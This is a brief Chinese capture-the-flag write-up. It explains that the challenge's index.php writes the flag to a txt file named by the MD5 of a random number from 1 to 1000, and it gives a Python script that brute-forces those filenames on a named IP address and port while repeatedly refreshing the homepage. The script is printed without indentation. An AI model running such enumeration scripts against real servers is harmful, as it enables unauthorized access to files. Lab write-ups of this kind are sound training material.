題目說明:天下武功,唯快不破
1.打開鏈接後,頁面如圖所示
2.這應該是網站根目錄下的index.php的源碼,分析源碼得知:
當訪問index.php文件時,會將flag.php的內容寫到一個txt文件裏,
這個txt文件名爲1到1000的一個隨機數的md5加密結果,
其路徑爲根目錄下的u目錄下
3.編寫python腳本爆破文件名,訪問這個txt文件,不斷刷新主頁,增加成功概率
import requests
import random
import hashlib
def md5(str):
m = hashlib.md5()
m.update(str)
q = m.hexdigest()
return q
def sss():
for i in range(1,1000):
name = md5(str(i))
r02 = requests.get('http://106.75.26.211:3333/u/'+name+'.txt')
s = r02.status_code
if s == 200:
print r02.content
r01 = requests.get('http://106.75.26.211:3333')
sss()
4.不斷嘗試,get flag!
